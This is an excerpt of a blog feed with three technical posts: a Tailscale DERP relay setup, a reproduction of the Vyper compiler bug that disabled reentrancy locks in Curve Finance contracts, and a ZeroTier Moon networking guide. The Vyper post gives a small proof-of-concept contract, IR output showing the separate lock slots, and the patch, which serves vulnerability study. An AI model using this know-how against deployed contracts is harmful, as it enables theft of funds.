&lt;p&gt;而在 P2P VPN 中，&lt;strong&gt;自建中继节点&lt;/strong&gt;是相当重要的。一方面自建中继节点可以比地理位置较远的官方中继节点&lt;strong&gt;更好的观察和协调本地两台对等机的 p2p 过程&lt;/strong&gt;，另一方面可以在打洞失败后&lt;strong&gt;快速中继和转发流量&lt;/strong&gt;。&lt;/p&gt;
&lt;p&gt;本人先前的文章已经介绍了 Zerotier 搭建中继节点 Moon 的原理和过程。Zerotier 会在特定 Primary Port 9993 上监听 UDP 连接来中继数据，因此在实际搭建的过程中&lt;strong&gt;只需将这一个 UDP 端口暴露至公网即可&lt;/strong&gt;，要求极低。而暴露端口有多种方式可以实现，例如内网穿透 FRP 等等，也因此 &lt;em&gt;moon 节点甚至都不需要有一个属于自己 IP 地址&lt;/em&gt;。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;注：Zerotier 不支持自建 TCP 中继，moon 节点实际上只是一个 UDP 中继节点。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;而 Tailscale 的中继服务器（称为 DERP 服务）的搭建与 zerotier 相比存在一点困难，而网络上的搭建教程真是参差不齐（跟我之前找 Zerotier Moon 的搭建过程一样难顶，这点要狠狠吐槽一下）。那么接下来，我们来尝试找到一种最简便的方式来构建 tailscale DERP 服务器，顺带学习一下 DERP 服务的一些原理。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Tailscale 的中继 DERP 服务就是一个 &lt;strong&gt;TCP&lt;/strong&gt; 中继节点，与 Zerotier 完全相反。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;TL,DR&lt;/strong&gt;: 如想跳过前置内容，直接快速了解搭建过程，请直接跳转至本文最后一节的&lt;strong&gt;总结部分&lt;/strong&gt;。&lt;/p&gt;
&lt;p&gt;看完本文，你将了解到&lt;strong&gt;无需公网机器、无需域名、无需证书、无需修改源代码、无需自托管 HeadScale 服务&lt;/strong&gt;的情况下，&lt;strong&gt;只需1-2个端口&lt;/strong&gt;，来快速构建 Tailscale-DERP 服务。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;需要注意的是本篇文章只考虑 tailscale 而不考虑 headscale，因为我希望使用的过程中能够尽可能简便，不想单独部署一个 headscale 控制服务器。&lt;/p&gt;
&lt;/blockquote&gt;</summary>
    
    
    
    <category term="Tools" scheme="https://kiprey.github.io/categories/Tools/"/>
    
    
    <category term="Tailscale" scheme="https://kiprey.github.io/tags/Tailscale/"/>
    
  </entry>
  
  <entry>
    <title>Curve Finance 漏洞复现</title>
    <link href="https://kiprey.github.io/2023/08/curve_finance_vuln/"/>
    <id>https://kiprey.github.io/2023/08/curve_finance_vuln/</id>
    <published>2023-08-09T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.969Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>智能合约在区块链的世界中较为重要。本文记录了笔者在复现 Python 智能合约编译器 Vyper 中的一个编译漏洞，该漏洞导致智能合约中的重入锁变得无效，进而使得合约易受<strong>重入攻击</strong>。</p><span id="more"></span><h2 id="二、环境搭建">二、环境搭建</h2><h3 id="1-Vyper-构建">1. Vyper 构建</h3><p>下载 Vyper 编译器源代码并通过 pip 安装依赖。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:vyperlang/vyper.git</span><br><span class="line"><span class="built_in">cd</span> vyper</span><br><span class="line"></span><br><span class="line"><span class="comment"># 依赖来自 setup.py &amp; requirements-docs.txt，不可直接照搬</span></span><br><span class="line">pip3 install <span class="string">&quot;asttokens&gt;=2.0.5,&lt;3&quot;</span> <span class="string">&quot;pycryptodome&gt;=3.5.1,&lt;4&quot;</span> <span class="string">&quot;semantic-version&gt;=2.10,&lt;3&quot;</span> <span class="string">&quot;importlib-metadata&quot;</span> <span class="string">&quot;wheel&quot;</span> <span class="string">&quot;sphinx==4.5.0&quot;</span> <span class="string">&quot;recommonmark==0.6.0&quot;</span> <span class="string">&quot;sphinx_rtd_theme==0.5.2&quot;</span></span><br></pre></td></tr></table></figure><p>运行 <code>python3 -m vyper --help</code>，能正常输出帮助信息即可：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">$ python3 -m vyper --<span class="built_in">help</span></span><br><span class="line">usage: __main__.py [-h] [--version] [--show-gas-estimates] [-f FORMAT] [--storage-layout-file STORAGE_LAYOUT [STORAGE_LAYOUT ...]]</span><br><span class="line">                   [--evm-version &#123;istanbul,berlin,london,paris,shanghai,cancun&#125;] [--no-optimize] [--optimize &#123;gas,codesize,none&#125;] [--debug] [--no-bytecode-metadata]</span><br><span class="line">                   [--traceback-limit TRACEBACK_LIMIT] [--verbose] [--standard-json] [--hex-ir] [-p ROOT_FOLDER] [-o OUTPUT_PATH]</span><br><span class="line">                   input_files [input_files ...]</span><br><span class="line"></span><br><span class="line">Pythonic Smart Contract Language <span class="keyword">for</span> the EVM</span><br><span class="line"></span><br><span class="line">positional arguments:</span><br><span class="line">  input_files           Vyper sourcecode to compile</span><br><span class="line"></span><br><span class="line">options:</span><br><span class="line">  -h, --<span class="built_in">help</span>            show this <span class="built_in">help</span> message and <span class="built_in">exit</span></span><br><span class="line">  --version             show program<span class="string">&#x27;s version number and exit</span></span><br><span class="line"><span class="string">  ...</span></span><br></pre></td></tr></table></figure><p>最后切换到漏洞引入点：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># https://github.com/vyperlang/vyper/commit/a09cdddd8ba249d1ce68ac31ec4496e50b8a25c7</span></span><br><span class="line">git checkout a09cdddd</span><br></pre></td></tr></table></figure><p>如果想要单步调试跟进，那就需要：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 在 vyper 项目根目录下</span></span><br><span class="line"><span class="built_in">cp</span> ./vyper/__main__.py vyper.py</span><br><span class="line">python3 vyper.py --<span class="built_in">help</span></span><br></pre></td></tr></table></figure><h3 id="2-合约下载">2. 合约下载</h3><p>合约的代码可以在链上合约地址处找到，例如 <a href="https://bscscan.com/address/0x245a45cdf2271d026976811a80c091fe5b49ac40#code">https://bscscan.com/address/0x245a45cdf2271d026976811a80c091fe5b49ac40#code</a></p><p><img src="/2023/08/curve_finance_vuln/image-20230810175940172.png" alt="image-20230810175940172"></p><p>合约是开源的，肯定有不止一种找到合约源代码的方式，上面也只是举例演示一下。</p><h2 id="三、漏洞根因">三、漏洞根因</h2><h3 id="1-安全的重入锁状态维护逻辑">1. 安全的重入锁状态维护逻辑</h3><p>在讲解漏洞根因之前，我们先来简单了解一下<strong>在引入漏洞 commit 之前，关于重入锁的状态维护逻辑</strong>。</p><p>对于重入锁来说，自然是需要在 Storage 上有一个 slot 用来存放锁的状态。也就是 <code>get_nonreentrant_lock</code> 函数做的事情：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 引入漏洞 commit 前</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_nonreentrant_lock</span>(<span class="params">func_type, global_ctx</span>):</span><br><span class="line">    nonreentrant_pre = [[<span class="string">&quot;pass&quot;</span>]]</span><br><span class="line">    nonreentrant_post = [[<span class="string">&quot;pass&quot;</span>]]</span><br><span class="line">    <span class="keyword">if</span> func_type.nonreentrant:</span><br><span class="line">        nkey = global_ctx.get_nonrentrant_counter(func_type.nonreentrant)</span><br><span class="line">        nonreentrant_pre = [[<span class="string">&quot;seq&quot;</span>, [<span class="string">&quot;assert&quot;</span>, [<span class="string">&quot;iszero&quot;</span>, [<span class="string">&quot;sload&quot;</span>, nkey]]], [<span class="string">&quot;sstore&quot;</span>, nkey, <span class="number">1</span>]]]</span><br><span class="line">        nonreentrant_post = [[<span class="string">&quot;sstore&quot;</span>, nkey, <span class="number">0</span>]]</span><br><span class="line">    <span class="keyword">return</span> nonreentrant_pre, nonreentrant_post</span><br></pre></td></tr></table></figure><p>从代码中可以看到，当某个函数被标记为<strong>禁止重入</strong>时，vyper 会在需要用到重入锁的合约逻辑时，编译生成以上一系列的 IR。这些 IR 做的事情很简单，获取锁时<strong>检查锁是否为 0 &amp;&amp; 将锁状态设置为 1</strong>；释放锁时<strong>重设锁状态为 0</strong>。</p><p>而存放锁状态的 slot 是通过 <code>global_ctx.get_nonrentrant_counter</code> 函数所得，也就是那个在漏洞 commit 里被标记为 dead code 的函数，该函数会根据传入的 key 来确定要用哪个 slot 来存放锁状态：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_nonrentrant_counter</span>(<span class="params">self, key</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Nonrentrant locks use a prefix with a counter to minimise deployment cost of a contract.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    We&#x27;re able to set the initial re-entrant counter using the sum of the sizes</span></span><br><span class="line"><span class="string">    of all the storage slots because all storage slots are allocated while parsing</span></span><br><span class="line"><span class="string">    the module-scope, and re-entrancy locks aren&#x27;t allocated until later when parsing</span></span><br><span class="line"><span class="string">    individual function scopes. This relies on the deprecated _globals attribute</span></span><br><span class="line"><span class="string">    because the new way of doing things (set_data_positions) doesn&#x27;t expose the</span></span><br><span class="line"><span class="string">    next unallocated storage location.</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> key <span class="keyword">in</span> <span class="variable language_">self</span>._nonrentrant_keys:</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>._nonrentrant_keys[key]</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        counter = (</span><br><span class="line">            <span class="built_in">sum</span>(v.size <span class="keyword">for</span> v <span class="keyword">in</span> <span class="variable language_">self</span>._<span class="built_in">globals</span>.values() <span class="keyword">if</span> <span class="keyword">not</span> <span class="built_in">isinstance</span>(v.typ, MappingType))</span><br><span class="line">            + <span class="variable language_">self</span>._nonrentrant_counter</span><br><span class="line">        )</span><br><span class="line">        <span class="variable language_">self</span>._nonrentrant_keys[key] = counter</span><br><span class="line">        <span class="variable language_">self</span>._nonrentrant_counter += <span class="number">1</span></span><br><span class="line">        <span class="keyword">return</span> counter</span><br></pre></td></tr></table></figure><p>而在函数重入中，这个 key 值是 vyper 脚本中的那个字符串，例如以下代码中的 <code>lock</code> 字符串，它用于区分开不同的重入锁：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@external</span></span><br><span class="line"><span class="meta">@nonreentrant(<span class="params"><span class="string">&#x27;lock&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add_liquidity</span>() -&gt; uint256:</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@external</span></span><br><span class="line"><span class="meta">@nonreentrant(<span class="params"><span class="string">&#x27;lock&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exchange</span>() -&gt; uint256:</span><br><span class="line">   <span class="keyword">return</span> <span class="number">0</span></span><br></pre></td></tr></table></figure><p>总结一句话，在引入漏洞 commit 之前，vyper 使用脚本里<strong>重入锁的字符串</strong>来<strong>区分开不同的重入锁</strong>，而区分的方式是<strong>根据字符串来选择用于存放重入锁状态的 slot 位置</strong>。这样一来，倘若<strong>不同函数</strong>使用了<strong>相同名称的重入锁</strong>，则这些重入锁将会使用同一个 slot，来抵御重入攻击。</p><h3 id="2-带有漏洞的重入锁状态维护逻辑">2. 带有漏洞的重入锁状态维护逻辑</h3><p>引入漏洞前，vyper 用于存放重入锁状态的各个 slot 是直接追加在<strong>全局变量分配存储</strong>的末尾：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_nonrentrant_counter</span>(<span class="params">self, key</span>):</span><br><span class="line">    <span class="keyword">if</span> key <span class="keyword">in</span> <span class="variable language_">self</span>._nonrentrant_keys:</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>._nonrentrant_keys[key]</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="comment"># 注意这里的 counter 是怎么计算得出的</span></span><br><span class="line">        counter = (</span><br><span class="line">            <span class="built_in">sum</span>(v.size <span class="keyword">for</span> v <span class="keyword">in</span> <span class="variable language_">self</span>._<span class="built_in">globals</span>.values() <span class="keyword">if</span> <span class="keyword">not</span> <span class="built_in">isinstance</span>(v.typ, MappingType))</span><br><span class="line">            + <span class="variable language_">self</span>._nonrentrant_counter</span><br><span class="line">        )</span><br><span class="line">        <span class="variable language_">self</span>._nonrentrant_keys[key] = counter</span><br><span class="line">        <span class="variable language_">self</span>._nonrentrant_counter += <span class="number">1</span></span><br><span class="line">        <span class="keyword">return</span> counter</span><br></pre></td></tr></table></figure><p>漏洞 commit <strong>尝试将重入锁的状态变量与其他全局变量的分配合并掉</strong>，即在解析 vyper  AST 阶段时就一并做掉重入锁的 slot 分配，而非在后续生成 IR 阶段时再去动态生成和指定重入锁的 slot 位置。因此 <code>global_ctx.get_nonrentrant_counter</code> 这个用来动态生成重入锁 slot 位置的函数就不再被调用了，被开发者标记为 dead code。而指定重入锁位置的重任则交付到了 <code>set_storage_slots</code> 函数上，该函数在 <strong>AST 解析阶段</strong>执行，其先前的作用<strong>只是用来指定各个变量存储的 slot 位置</strong>。</p><p><img src="/2023/08/curve_finance_vuln/image-20230810181144949.png" alt="image-20230810181144949"></p><p>从这里我们可以看到，在漏洞 commit 里 vyper 是怎么指定各个函数的重入锁所在 slot 呢？没错，它每个函数分配一个重入锁 slot，也就是说对于<strong>不同函数</strong>的<strong>同名重入锁</strong>而言，这些重入锁相互之间不会阻止重入。</p><h3 id="3-漏洞演示">3. 漏洞演示</h3><p>以下是一个关于该 vyper 重入漏洞的 POC：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@external</span></span><br><span class="line"><span class="meta">@nonreentrant(<span class="params"><span class="string">&#x27;lock&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add_liquidity</span>() -&gt; uint256:</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@external</span></span><br><span class="line"><span class="meta">@nonreentrant(<span class="params"><span class="string">&#x27;lock&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exchange</span>() -&gt; uint256:</span><br><span class="line">   <span class="keyword">return</span> <span class="number">0</span></span><br></pre></td></tr></table></figure><p>这个 POC 的逻辑很简单，它声明了<strong>两个不同的函数</strong>，但这两个函数使用了<strong>相同名称的重入锁</strong>。我们来输出它的 IR 看看：</p><p>输出 IR 命令：<code>python3 vyper.py -f ir &lt;vyper-script-path&gt;</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">$ python3 vyper.py -f ir vyper_workdir/test.vy</span><br><span class="line">[<span class="built_in">seq</span>,</span><br><span class="line">  [<span class="built_in">return</span>,</span><br><span class="line">    0,</span><br><span class="line">    [lll,</span><br><span class="line">      [<span class="built_in">seq</span>,</span><br><span class="line">        [<span class="keyword">if</span>, [lt, calldatasize, 4], [goto, fallback]],</span><br><span class="line">        [mstore, 28, [calldataload, 0]],</span><br><span class="line">        [with,</span><br><span class="line">          _func_sig,</span><br><span class="line">          [mload, 0],</span><br><span class="line">          [<span class="built_in">seq</span>,</span><br><span class="line">            [assert, [iszero, callvalue]],</span><br><span class="line">            <span class="comment"># Line 3</span></span><br><span class="line">            [<span class="keyword">if</span>,</span><br><span class="line">              [eq, _func_sig, 3964006281 &lt;add_liquidity()&gt;],</span><br><span class="line">              [<span class="built_in">seq</span>,</span><br><span class="line">                [assert, [iszero, [sload, 0]]],    <span class="comment"># 检查重入锁状态</span></span><br><span class="line">                [sstore, 0 /*slot*/, 1 /*val*/],   <span class="comment"># 获取重入锁</span></span><br><span class="line">                pass,</span><br><span class="line">                <span class="comment"># Line 4</span></span><br><span class="line">                [mstore, 0, 0],</span><br><span class="line">                [seq_unchecked, [sstore, 0, 0], [<span class="built_in">return</span>, 0, 32]],</span><br><span class="line">                <span class="comment"># Line 3</span></span><br><span class="line">                [sstore, 0, 0],                    <span class="comment"># 释放重入锁</span></span><br><span class="line">                stop]],</span><br><span class="line">            <span class="comment"># Line 8</span></span><br><span class="line">            [<span class="keyword">if</span>,</span><br><span class="line">              [eq, _func_sig, 3539412570 &lt;exchange()&gt;],</span><br><span class="line">              [<span class="built_in">seq</span>,</span><br><span class="line">                [assert, [iszero, [sload, 1]]],    <span class="comment"># 检查重入锁状态</span></span><br><span class="line">                [sstore, 1, 1],                    <span class="comment"># 获取重入锁</span></span><br><span class="line">                pass,</span><br><span class="line">                <span class="comment"># Line 9</span></span><br><span class="line">                [mstore, 0, 0],</span><br><span class="line">                [seq_unchecked, [sstore, 1, 0], [<span class="built_in">return</span>, 0, 32]],</span><br><span class="line">                <span class="comment"># Line 8</span></span><br><span class="line">                [sstore, 1, 0],                    <span class="comment"># 释放重入锁</span></span><br><span class="line">                stop]]]],</span><br><span class="line">        [seq_unchecked, [label, fallback], /* Default <span class="keyword">function</span> */ [revert, 0, 0]]],</span><br><span class="line">      0]]]</span><br></pre></td></tr></table></figure><p>可以看到那两对 sstore 指令使用的 slot 不是同一个，第一个函数使用了 slot0，而第二个函数使用了 slot1。</p><h3 id="4-漏洞修复">4. 漏洞修复</h3><p><a href="https://github.com/vyperlang/vyper/commit/eae0eaf8#diff-bbb2d32046e0a730536ca9e7d0b871e3765826115fc9f0c0228ddf08f171dde6R35">漏洞补丁</a>很简单，只允许在<strong>出现不同名的重入锁时</strong>才使用新的 slot：</p><p><img src="/2023/08/curve_finance_vuln/image-20230810190717895.png" alt="image-20230810190717895"></p><!--## 四、链上合约复现现在要复现一下在真实合约里利用该漏洞进行攻击的操作。首先是找到目标合约的源代码。通过一系列的搜索，最后确定源代码位置为 [CurveCryptoSwap2ETH - github](https://github.com/curvefi/curve-crypto-contract/blob/master/contracts/two/CurveCryptoSwap2ETH.vy)**注意：由于漏洞影响跨度大，因此合约代码的 commit 时间已经要和带有漏洞的 vyper commit 时间相对应，否则会编译失败。**我个人是先把 vyper checkout 到了[漏洞补丁的上一个 commit 处](https://github.com/vyperlang/vyper/commit/3931ba4bf83eed2b9af7635362905c1b6e3a48a7)，这个 commit 的时间是 2021.10.25；然后再把合约代码 checkout 到了 [2021.12.5 的版本](https://github.com/curvefi/curve-crypto-contract/commit/101af9bb511f832ca5b) 上。合约代码稍微有点超前但是还是可以正常编译（**注意要把合约里第一行的版本被删除掉**）：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ python3 ../vyper.py ./curve-crypto-contract/contracts/two/CurveCryptoSwap2ETH.vy</span><br><span class="line">0x60206154b260c03960c0518060a01c6154ad5761014052602060206154b20160c03960c0518060a01c6154ad576101605261014051602055602060406154b20160c03960c05160801b61018052602060606154b20160c03960c05161018051176101805261018051600b5561018051600c55602060806154b20160c03960c051601755602060a06154b20160c03960c051601855602060c06154b20160c03960c0...</span><br></pre></td></tr></table></figure><p>接下来就要去 <a href="https://remix.ethereum.org/">Remix IDE</a> 上编译一下合约。但在进一步之前，在 Remix 需要里先点击插件处，安装 Vyper 插件，然后才能在侧边栏上找到 Vyper 的编译按钮。</p><p><img src="curve_finance_vuln/image-20230811170232884.png" alt="image-20230811170232884"></p><p>有意思的是，这里的 Vyper 版本刚好位于受影响范围内（0.2.15/0.2.16/0.3.0），因此我们本地就可以无需手动编译并上传 EVM 字节码了：</p><p><img src="curve_finance_vuln/image-20230811170403914.png" alt="image-20230811170403914"></p><blockquote><p>但事实上如图所示我还是没编译成功， 返回了一个 “Failed to fetch” 错误，也不知道是不是因为网络环境的问题。<br>–&gt;</p></blockquote><h2 id="五、参考">五、参考</h2><ul><li><a href="https://medium.com/chainlight/curve-finance-analysis-and-post-mortem-ba55f2b26909">Curve Finance Analysis and Post-mortem - medium</a></li></ul>-->]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;智能合约在区块链的世界中较为重要。本文记录了笔者在复现 Python 智能合约编译器 Vyper 中的一个编译漏洞，该漏洞导致智能合约中的重入锁变得无效，进而使得合约易受&lt;strong&gt;重入攻击&lt;/strong&gt;。&lt;/p&gt;</summary>
    
    
    
    <category term="Blockchain" scheme="https://kiprey.github.io/categories/Blockchain/"/>
    
    
    <category term="Curve Finance" scheme="https://kiprey.github.io/tags/Curve-Finance/"/>
    
  </entry>
  
  <entry>
    <title>使用 Frpc 进行内网穿透构建 ZeroTier Moon 记录</title>
    <link href="https://kiprey.github.io/2023/05/zerotier_moon_frpc/"/>
    <id>https://kiprey.github.io/2023/05/zerotier_moon_frpc/</id>
    <published>2023-05-16T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.218Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>Zerotier 是一个专用于异地组网的工具，它方便将多台异地机器以 P2P 或者 中转 Relay 的方式实现宛如局域网般的流畅体验。</p><p>Zerotier 组网中节点分为三个部分，分别是位于国外的中央服务器 Planet，用户自建节点 Moon，以及用户其他节点 Leaf。</p><p>由于 Planet 位于国外，当两台机器地理位置相隔甚远时，无论是 UDP 打洞还是 Relay 中继，速度都非常慢，因此尝试自建一台国内Zerotier Moon 来提高打洞概率 + 中继速度。</p><p>网上搭建 Zerotier Moon 的教程都需要购买一台服务器，但本人不想这么折腾，因此尝试探索 FRPC 内网穿透的搭建方式。</p><span id="more"></span><h2 id="二、Zerotier-打洞-中继">二、Zerotier 打洞/中继</h2><p>在做内网穿透/搭建 Moon 之前，我们得先理解 Zerotier 的打洞和中继原理。</p><blockquote><p>本节参考：<a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/OneService.cpp">ZeroTierOne/service/OneService.cpp - github</a>，以及自己花费大量时间调试 + wireshark 抓包的痛苦经验。</p></blockquote><h3 id="1-监听状态">1. 监听状态</h3><p>Zerotier 会在本地同时使用 <strong>3 个端口</strong>，其中每个端口都会分别<strong>监听 TCP 和 UDP 连接</strong>。以下是 Zerotier 在我本机上的监听：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">➜  zerotier-one <span class="built_in">sudo</span> lsof -i -P -n | grep zerotier</span><br><span class="line">zerotier- 2091716    zerotier-one    6u  IPv4 868501026      0t0  TCP 127.0.0.1:9993 (LISTEN)</span><br><span class="line">zerotier- 2091716    zerotier-one    7u  IPv6 868501027      0t0  TCP [::1]:9993 (LISTEN)</span><br><span class="line"></span><br><span class="line">zerotier- 2091716    zerotier-one   16u  IPv4 868501047      0t0  UDP 192.168.51.236:9993</span><br><span class="line">zerotier- 2091716    zerotier-one   17u  IPv4 868501048      0t0  TCP 192.168.51.236:9993 (LISTEN)</span><br><span class="line"></span><br><span class="line">zerotier- 2091716    zerotier-one   14u  IPv4 868501045      0t0  UDP 192.168.51.236:30978</span><br><span class="line">zerotier- 2091716    zerotier-one   15u  IPv4 868501046      0t0  TCP 192.168.51.236:30978 (LISTEN)</span><br><span class="line"></span><br><span class="line">zerotier- 2091716    zerotier-one   18u  IPv4 868501049      0t0  UDP 192.168.51.236:42276</span><br><span class="line">zerotier- 2091716    zerotier-one   19u  IPv4 868501050      0t0  TCP 192.168.51.236:42276 (LISTEN)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ... 略去剩余 IPv6 监听信息</span></span><br></pre></td></tr></table></figure><h3 id="2-三个端口">2. 三个端口</h3><p>先讲端口，这三个端口分别为首选端口、次选端口和末选端口，这三个端口的定义如注释所描述的那样：</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ref: https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/OneService.cpp#L802</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">* To attempt to handle NAT/gateway craziness we use three local UDP ports:</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* [0] is the normal/default port, usually 9993</span></span><br><span class="line"><span class="comment">* [1] is a port derived from our ZeroTier address</span></span><br><span class="line"><span class="comment">* [2] is a port computed from the normal/default for use with uPnP/NAT-PMP mappings</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* [2] exists because on some gateways trying to do regular NAT-t interferes</span></span><br><span class="line"><span class="comment">* destructively with uPnP port mapping behavior in very weird buggy ways.</span></span><br><span class="line"><span class="comment">* It&#x27;s only used if uPnP/NAT-PMP is enabled in this build.</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>其中<strong>首选端口默认固定为 9993</strong>（默认端口可被修改，参阅<a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/README.md">ZeroTier One Network Virtualization Service Documentation</a>）。</p><blockquote><p>我在网上看搭建 Moon 的教程中有看到过设置 9995 端口的，不看源码是真容易搞不清楚哪个端口更重要。</p><p>现在明确一点，Zerotier 默认情况下不涉及 9995 端口，<strong>只涉及到 9993 端口</strong>。</p></blockquote><p>当 host 尝试连接 peer 时，这三个端口会同时发送 <strong>UDP 数据</strong>至 peer。</p><blockquote><p>上下文中 host 指代本机，尽管 p2p 是去中心化的，但是为了便于说明还是要区分本机和远程对等机。</p></blockquote><p>peer 在接收到数据后，对应端口会立即朝着源地址返回一个 UDP 包打洞。倘若 host 接收到 peer 返回的三个 UDP 包的任意一个，则视为可被 DIRECT ACCESS，即 P2P 打洞成功。host 和 peer 会定期发送心跳包维护 p2p 洞，此时数据传递所使用的端口即 <strong>host 成功接收到的 peer 包的那个端口</strong>。</p><blockquote><p>在抓包时，经常看见 host 发三个 udp 给 Peer（注意一共有三个端口，一个端口发一个），而最后只能从 peer 那边接收到一个 UDP 包。</p></blockquote><p>使用 <code>zerotier-cli peers</code> 